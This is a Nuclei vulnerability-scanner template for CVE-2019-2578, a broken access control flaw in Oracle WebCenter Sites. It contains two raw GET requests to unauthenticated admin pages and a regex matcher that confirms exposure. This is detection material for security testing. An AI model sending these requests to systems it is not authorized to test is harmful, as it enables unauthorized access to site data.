nuclei-templates/http/cves/2019/CVE-2019-2578.yaml

41 lines
1.4 KiB
YAML

id: CVE-2019-2578
info:
name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control
author: leovalcante
severity: high
description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
reference:
- https://www.oracle.com/security-alerts/cpuapr2019.html
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://nvd.nist.gov/vuln/detail/CVE-2019-2578
- http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2019-2578
epss-score: 0.00815
cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*
epss-percentile: 0.79635
metadata:
max-request: 2
vendor: oracle
product: webcenter_sites
tags: cve,cve2019,oracle,wcs,auth-bypass
http:
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
Host: {{Hostname}}
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: regex
part: body
regex:
- '<script[\d\D]*<throwexception/>'